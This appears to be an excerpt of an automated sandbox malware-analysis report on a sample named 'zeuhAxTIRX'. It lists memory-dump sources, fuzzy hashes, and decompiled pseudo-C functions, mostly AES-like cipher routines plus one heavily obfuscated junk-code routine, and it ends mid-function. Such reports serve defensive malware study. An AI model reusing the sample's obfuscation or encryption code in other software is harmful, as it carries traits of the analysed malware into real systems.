                                                                                                                0x00e5c4ac
                                                                                                                0x00e5c4af
                                                                                                                0x00e5c4b2
                                                                                                                0x00e5c4b5
                                                                                                                0x00e5c4bc
                                                                                                                0x00e5c4cb
                                                                                                                0x00e5c4ce
                                                                                                                0x00e5c4d5
                                                                                                                0x00e5c4d8
                                                                                                                0x00e5c4db
                                                                                                                0x00e5c4de
                                                                                                                0x00e5c4e1
                                                                                                                0x00e5c4e4
                                                                                                                0x00e5c4e7
                                                                                                                0x00e5c4f0
                                                                                                                0x00e5c501
                                                                                                                0x00e5c509
                                                                                                                0x00e5c50f
                                                                                                                0x00e5c512
                                                                                                                0x00e5c514
                                                                                                                0x00e5c517
                                                                                                                0x00e5c51a
                                                                                                                0x00e5c527

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (
                                                                                                                • API String ID: 0-3887548279
                                                                                                                • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                • Instruction ID: 70c5d2c63fa01a081d41fa1c683ef4bc5a6f95072943e83cfcac300159438fc3
                                                                                                                • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                • Instruction Fuzzy Hash: 25021CB6E006189FDB14CF9AD8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 26%
                                                                                                                			E00E55823(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				void* _t273;
                                                                                                                				signed int _t274;
                                                                                                                				signed int _t282;
                                                                                                                				signed int* _t358;
                                                                                                                				signed int _t383;
                                                                                                                				signed int* _t409;
                                                                                                                				signed int _t429;
                                                                                                                				signed int _t458;
                                                                                                                				signed int _t478;
                                                                                                                				signed int _t560;
                                                                                                                				signed int _t603;
                                                                                                                
                                                                                                                				_t273 = __eax;
                                                                                                                				asm("ror edi, 0x8");
                                                                                                                				asm("rol edx, 0x8");
                                                                                                                				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
                                                                                                                				asm("ror ebx, 0x8");
                                                                                                                				asm("rol edx, 0x8");
                                                                                                                				_v20 = _t458;
                                                                                                                				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
                                                                                                                				asm("ror ebx, 0x8");
                                                                                                                				asm("rol edx, 0x8");
                                                                                                                				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
                                                                                                                				asm("ror esi, 0x8");
                                                                                                                				asm("rol edx, 0x8");
                                                                                                                				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
                                                                                                                				asm("ror edx, 0x10");
                                                                                                                				asm("ror esi, 0x8");
                                                                                                                				asm("rol esi, 0x8");
                                                                                                                				_v24 = _t282;
                                                                                                                				_t429 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
                                                                                                                				asm("ror esi, 0x10");
                                                                                                                				asm("ror ebx, 0x8");
                                                                                                                				asm("rol ebx, 0x8");
                                                                                                                				_t603 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
                                                                                                                				asm("ror ebx, 0x8");
                                                                                                                				asm("ror edi, 0x10");
                                                                                                                				asm("rol edi, 0x8");
                                                                                                                				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
                                                                                                                				asm("ror edi, 0x10");
                                                                                                                				asm("ror ebx, 0x8");
                                                                                                                				asm("rol ebx, 0x8");
                                                                                                                				_t409 =  &(__ecx[8]);
                                                                                                                				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
                                                                                                                				_t478 = (_a4 >> 1) - 1;
                                                                                                                				_a4 = _t478;
                                                                                                                				if(_t478 != 0) {
                                                                                                                					do {
                                                                                                                						asm("ror edi, 0x10");
                                                                                                                						asm("ror ebx, 0x8");
                                                                                                                						asm("rol ebx, 0x8");
                                                                                                                						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
                                                                                                                						asm("ror edi, 0x10");
                                                                                                                						asm("ror ebx, 0x8");
                                                                                                                						asm("rol ebx, 0x8");
                                                                                                                						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
                                                                                                                						asm("ror ebx, 0x8");
                                                                                                                						asm("ror edi, 0x10");
                                                                                                                						asm("rol edi, 0x8");
                                                                                                                						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
                                                                                                                						asm("ror edi, 0x10");
                                                                                                                						asm("ror edx, 0x8");
                                                                                                                						asm("rol edx, 0x8");
                                                                                                                						_v24 = _t383;
                                                                                                                						_t560 =  *(__eax + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
                                                                                                                						asm("ror edx, 0x10");
                                                                                                                						asm("ror esi, 0x8");
                                                                                                                						asm("rol esi, 0x8");
                                                                                                                						_t429 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t560 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
                                                                                                                						asm("ror esi, 0x10");
                                                                                                                						asm("ror ebx, 0x8");
                                                                                                                						asm("rol ebx, 0x8");
                                                                                                                						_t603 =  *(__eax + 4 + (_t560 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
                                                                                                                						_v12 = _t560;
                                                                                                                						asm("ror edi, 0x8");
                                                                                                                						asm("ror ebx, 0x10");
                                                                                                                						asm("rol ebx, 0x8");
                                                                                                                						_v16 =  *(__eax + 4 + (_t560 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
                                                                                                                						asm("ror ebx, 0x10");
                                                                                                                						asm("ror edi, 0x8");
                                                                                                                						asm("rol edi, 0x8");
                                                                                                                						_t409 =  &(_t409[8]);
                                                                                                                						_t205 =  &_a4;
                                                                                                                						 *_t205 = _a4 - 1;
                                                                                                                						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
                                                                                                                					} while ( *_t205 != 0);
                                                                                                                				}
                                                                                                                				asm("ror ebx, 0x8");
                                                                                                                				asm("rol edi, 0x8");
                                                                                                                				 *_a8 = (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
                                                                                                                				asm("ror ebx, 0x8");
                                                                                                                				asm("rol edi, 0x8");
                                                                                                                				_a8[1] = (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
                                                                                                                				asm("ror ebx, 0x8");
                                                                                                                				asm("rol edi, 0x8");
                                                                                                                				_t358 = _a8;
                                                                                                                				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
                                                                                                                				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
                                                                                                                				asm("ror ecx, 0x8");
                                                                                                                				asm("rol edi, 0x8");
                                                                                                                				_t358[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0x00ff00ff;
                                                                                                                				return _t274;
                                                                                                                			}




















                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                • Instruction ID: e6ed9a3c632e33486758c55f075edac4347ab49b3472c8a6737d5e740bcb19e7
                                                                                                                • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                • Instruction Fuzzy Hash: 29026E73E547164FE720CE4ACDC4765B3A3EFC8311F5B81B8CA142B613CA39BA525A90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 67%
                                                                                                                			E00E55603(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
                                                                                                                				signed int _t66;
                                                                                                                				signed int* _t69;
                                                                                                                				signed int* _t81;
                                                                                                                				signed int _t94;
                                                                                                                				signed int _t96;
                                                                                                                				signed int _t106;
                                                                                                                				signed int _t108;
                                                                                                                				signed int* _t110;
                                                                                                                				signed int _t127;
                                                                                                                				signed int _t129;
                                                                                                                				signed int _t133;
                                                                                                                				signed int _t152;
                                                                                                                				intOrPtr _t171;
                                                                                                                
                                                                                                                				_t81 = _a12;
                                                                                                                				_t110 = _a8;
                                                                                                                				asm("ror esi, 0x8");
                                                                                                                				asm("rol eax, 0x8");
                                                                                                                				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
                                                                                                                				asm("ror edi, 0x8");
                                                                                                                				asm("rol esi, 0x8");
                                                                                                                				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
                                                                                                                				asm("ror edi, 0x8");
                                                                                                                				asm("rol esi, 0x8");
                                                                                                                				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
                                                                                                                				_t66 =  &(_t110[1]);
                                                                                                                				asm("ror edi, 0x8");
                                                                                                                				asm("rol esi, 0x8");
                                                                                                                				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
                                                                                                                				asm("ror edi, 0x8");
                                                                                                                				asm("rol esi, 0x8");
                                                                                                                				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
                                                                                                                				asm("ror edi, 0x8");
                                                                                                                				asm("rol esi, 0x8");
                                                                                                                				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
                                                                                                                				asm("ror edi, 0x8");
                                                                                                                				asm("rol esi, 0x8");
                                                                                                                				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
                                                                                                                				asm("ror esi, 0x8");
                                                                                                                				asm("rol ecx, 0x8");
                                                                                                                				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
                                                                                                                				if(_a16 != 0x100) {
                                                                                                                					L4:
                                                                                                                					return _t66 | 0xffffffff;
                                                                                                                				} else {
                                                                                                                					_t171 = _a4;
                                                                                                                					_t69 = 0;
                                                                                                                					_a12 = 0;
                                                                                                                					while(1) {
                                                                                                                						_t152 =  *(_t66 + 0x18);
                                                                                                                						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
                                                                                                                						_t127 =  *_t66 ^ _t94;
                                                                                                                						 *(_t66 + 0x1c) = _t94;
                                                                                                                						_t96 =  *(_t66 + 4) ^ _t127;
                                                                                                                						 *(_t66 + 0x20) = _t127;
                                                                                                                						_t129 =  *(_t66 + 8) ^ _t96;
                                                                                                                						 *(_t66 + 0x24) = _t96;
                                                                                                                						 *(_t66 + 0x28) = _t129;
                                                                                                                						if(_t69 == 6) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
                                                                                                                						_t133 =  *(_t66 + 0x10) ^ _t106;
                                                                                                                						 *(_t66 + 0x2c) = _t106;
                                                                                                                						_t108 =  *(_t66 + 0x14) ^ _t133;
                                                                                                                						 *(_t66 + 0x34) = _t108;
                                                                                                                						_t69 =  &(_a12[0]);
                                                                                                                						 *(_t66 + 0x30) = _t133;
                                                                                                                						 *(_t66 + 0x38) = _t108 ^ _t152;
                                                                                                                						_t66 = _t66 + 0x20;
                                                                                                                						_a12 = _t69;
                                                                                                                						if(_t69 < 7) {
                                                                                                                							continue;
                                                                                                                						} else {
                                                                                                                							goto L4;
                                                                                                                						}
                                                                                                                						goto L6;
                                                                                                                					}
                                                                                                                					return 0xe;
                                                                                                                				}
                                                                                                                				L6:
                                                                                                                			}

















                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                                                                • Instruction ID: a63a59d9e7dfae5657de39d3a1293fa37dd978440410cb003728a2f21c58ed6b
                                                                                                                • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                                                                • Instruction Fuzzy Hash: E85180B3E14A214BD3188E09CC50631B792FFC8312B5F81BADD199B357CA74E9529A90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 43%
                                                                                                                			E00E729E4(signed int __eax, signed int __ebx, signed int __ecx, signed char __edx, signed int __esi) {
                                                                                                                				char _v3;
                                                                                                                				signed int _t24;
                                                                                                                				void* _t26;
                                                                                                                				signed char _t31;
                                                                                                                				signed int _t33;
                                                                                                                				signed int _t57;
                                                                                                                				signed int _t71;
                                                                                                                				void* _t73;
                                                                                                                
                                                                                                                				_t57 = __esi;
                                                                                                                				_t45 = __edx;
                                                                                                                				_t38 = __ecx;
                                                                                                                				_t33 = __ebx;
                                                                                                                				_t24 = __eax;
                                                                                                                				goto L1;
                                                                                                                				do {
                                                                                                                					do {
                                                                                                                						do {
                                                                                                                							do {
                                                                                                                								do {
                                                                                                                									do {
                                                                                                                										L1:
                                                                                                                										_t33 = _t33 ^  *0x939ff7b7;
                                                                                                                										_t73 =  *0x8f83e7b0 - _t38;
                                                                                                                									} while (_t73 == 0);
                                                                                                                									asm("sbb [0xc419e217], esi");
                                                                                                                									asm("sbb esi, [0x84e5c4bb]");
                                                                                                                								} while (_t73 != 0);
                                                                                                                								asm("rcl dword [0xdd634e75], 0x9a");
                                                                                                                								asm("adc [0xaeb00218], cl");
                                                                                                                							} while (_t73 >= 0);
                                                                                                                							asm("adc ecx, [0xe77cd173]");
                                                                                                                							asm("lodsb");
                                                                                                                							asm("adc edi, [0xef4544a1]");
                                                                                                                							 *0x2f9d1616 =  *0x2f9d1616 | _t57;
                                                                                                                							asm("sbb dl, [0xc1ddbd1c]");
                                                                                                                							asm("sbb dl, 0x32");
                                                                                                                							_t33 = _t33 -  *0xefa8e0cc;
                                                                                                                							 *0x85c02c16 =  *0x85c02c16 >> 0x92;
                                                                                                                							 *0xb2efca25 =  *0xb2efca25 ^ _t71;
                                                                                                                							 *0xa8e0cc32 =  *0xa8e0cc32 + _t45;
                                                                                                                							_pop( *0xc1daa919);
                                                                                                                							 *0xa8e0cc32 =  *0xa8e0cc32 >> 0xcf;
                                                                                                                						} while (( *0xc83916ef & _t33) != 0);
                                                                                                                						 *0xd8a8c4a8 =  *0xd8a8c4a8 | _t24;
                                                                                                                						_t71 =  *0x997775 & 0x8b7a16ef;
                                                                                                                						asm("ror dword [0xc68ff209], 0xad");
                                                                                                                						 *0x3816efa8 =  *0x3816efa8 >> 0xa6;
                                                                                                                						_push(_t45);
                                                                                                                						_push(_t24 + 1);
                                                                                                                						 *0xef45d88d =  *0xef45d88d >> 0x40;
                                                                                                                						 *0x81d04116 = _t57 | 0x173a7bc8;
                                                                                                                						_t38 = 0x3a;
                                                                                                                						asm("adc ecx, [0x50405217]");
                                                                                                                						_push( *0xef45d88d);
                                                                                                                						 *0x81c42916 =  *0x81c42916 - 0x3a;
                                                                                                                						asm("adc ah, 0x3a");
                                                                                                                						 *0x50405217 =  *0x50405217 << 0xec;
                                                                                                                						_t57 =  *0x81d04116 &  *0xef45d88d;
                                                                                                                						asm("rcl dword [0x9cba1d16], 0x78");
                                                                                                                						_pop(_t26);
                                                                                                                						_t24 = _t26 - 0xb4;
                                                                                                                						 *0x8daddd0f =  *0x8daddd0f ^ 0x0000003a;
                                                                                                                						asm("scasb");
                                                                                                                						_push(0xe0cc32c1);
                                                                                                                						asm("sbb esi, 0x32ee16ef");
                                                                                                                						asm("rcr dword [0x1db40ffd], 0x25");
                                                                                                                						_t45 = (_t45 & 0x000000e7) - 0xe0cc3283;
                                                                                                                						asm("adc bl, 0xa8");
                                                                                                                						asm("rcr dword [0x6d2b16ef], 0x1a");
                                                                                                                						asm("rcl byte [0xefbe0b1c], 0x18");
                                                                                                                						asm("adc ebx, [0xbe17ff2f]");
                                                                                                                						asm("ror byte [0x16efa8e0], 0x32");
                                                                                                                						 *0x2b7093ff =  *0x2b7093ff & _t24;
                                                                                                                						asm("adc [0xfa34f216], esp");
                                                                                                                						 *0xa8e0cc32 =  *0xa8e0cc32 - _t45;
                                                                                                                						_t33 = _t33 -  *0x32c5f7c6 & 0xc62116ef;
                                                                                                                						asm("adc ch, 0xb3");
                                                                                                                						asm("adc eax, [0xd601ee67]");
                                                                                                                						asm("sbb ebp, [0x49395fc0]");
                                                                                                                						asm("rcr byte [0xa2f716d2], 0xd7");
                                                                                                                					} while (_t33 <= 0);
                                                                                                                					asm("rcr dword [0x395f828e], 0x3d");
                                                                                                                					 *0x36b616d2 =  *0x36b616d2 ^ 0x39;
                                                                                                                					 *0xebb8140b =  *0xebb8140b << 0x9c;
                                                                                                                					 *0xa816efa8 = _t24;
                                                                                                                					asm("scasb");
                                                                                                                					asm("adc ebx, 0x9e8e16ef");
                                                                                                                					 *0xe0cc32c1 = _t57;
                                                                                                                					 *0xba16efa8 =  *0xba16efa8 & 0xce9d8d8c;
                                                                                                                					asm("adc al, [0xaf869af2]");
                                                                                                                					asm("cmpsw");
                                                                                                                					 *0xbed3f5bd =  *0xbed3f5bd << 0xe3;
                                                                                                                					asm("adc [0x16d24939], esi");
                                                                                                                					asm("rcl dword [0xa4071c62], 0x1d");
                                                                                                                					 *0xcc32c1db =  *0xcc32c1db >> 0x8f;
                                                                                                                					 *0xfe16efa8 = 0x39;
                                                                                                                					_t33 = _t33 -  *0x16d24939 -  *0x9a7c73a2;
                                                                                                                					 *0x45d8a8c4 =  *0x45d8a8c4 + ( *0xa816efa8 - 0x000000e0 & 0x000000a8);
                                                                                                                					_t24 =  *0xf4be16ef;
                                                                                                                					_t38 =  *0x49395fa8;
                                                                                                                					 *0x49395fa8 =  *0xfe16efa8 & 0x99d1b49b;
                                                                                                                					_t57 = _t57 |  *0x33947a16;
                                                                                                                					_t45 = 0xc1dec32e;
                                                                                                                					asm("sbb ah, [0xa8e0cc32]");
                                                                                                                					asm("adc dl, [0xccecc9b4]");
                                                                                                                					asm("adc edi, [0x49395fc2]");
                                                                                                                					asm("ror byte [0xc48616d2], 0x93");
                                                                                                                					asm("adc esi, 0xe0cc32c1");
                                                                                                                					 *0x16efa8 =  *0x16efa8 | _t24;
                                                                                                                					 *0x704b93b7 =  *0x704b93b7 >> 0x50;
                                                                                                                					asm("lodsb");
                                                                                                                					asm("scasd");
                                                                                                                					asm("ror dword [0x16d24939], 0x4a");
                                                                                                                					 *0xaddd0fb4 =  *0xaddd0fb4 - _t38;
                                                                                                                					_push( *0xef45d88d);
                                                                                                                					 *0x90e04c16 =  *0x90e04c16 - _t71;
                                                                                                                				} while ( *0x90e04c16 > 0);
                                                                                                                				_t31 = _t24 &  *0xa8008977;
                                                                                                                				 *0xf9e2bc0 =  *0xf9e2bc0 - (_t38 ^  *0x45d8a8c4);
                                                                                                                				 *0x8f16ef88 =  *0x8f16ef88 | _t31;
                                                                                                                				asm("ror dword [0x826380d6], 0xa1");
                                                                                                                				asm("rol byte [0xd8a8c4a8], 0x16");
                                                                                                                				 *0x121f16ef =  *0x121f16ef >> 9;
                                                                                                                				 *0x5fc2ccf0 =  &_v3 +  *0x40ecb2a1;
                                                                                                                				asm("sbb edx, [0x2e339416]");
                                                                                                                				return _t31;
                                                                                                                			}












                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: baccb80e81f64dee43b01be8251fb4b1c90325099889ace9cb644f6aef7c5aa1
                                                                                                                • Instruction ID: 43c00c71949070f53f16acd3aa405930ae815c87d928859bd4c27130bd651586
                                                                                                                • Opcode Fuzzy Hash: baccb80e81f64dee43b01be8251fb4b1c90325099889ace9cb644f6aef7c5aa1
                                                                                                                • Instruction Fuzzy Hash: 8481F0328493D1DFEB05CF38E89A7863F75E786320B48478DC9A2575D2D760156ACB81
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 62%
                                                                                                                			E00E555FA(void* __eax, intOrPtr _a4, signed int* _a12, signed int* _a16, intOrPtr _a20) {
                                                                                                                				signed int _t69;
                                                                                                                				signed int* _t76;
                                                                                                                				signed int* _t89;
                                                                                                                				signed int _t102;
                                                                                                                				signed int _t104;
                                                                                                                				signed int _t114;
                                                                                                                				signed int _t116;
                                                                                                                				signed int* _t118;
                                                                                                                				signed int _t135;
                                                                                                                				signed int _t137;
                                                                                                                				signed int _t141;
                                                                                                                				signed int _t162;
                                                                                                                				intOrPtr _t184;
                                                                                                                
                                                                                                                				asm("out dx, eax");
                                                                                                                				asm("cli");
                                                                                                                				_t89 = _a16;
                                                                                                                				_t118 = _a12;
                                                                                                                				_push(0xec8b556a);
                                                                                                                				asm("ror esi, 0x8");
                                                                                                                				asm("rol eax, 0x8");
                                                                                                                				 *_t118 =  *_t89 & 0xff00ff00 |  *_t89 & 0x00ff00ff;
                                                                                                                				asm("ror edi, 0x8");
                                                                                                                				asm("rol esi, 0x8");
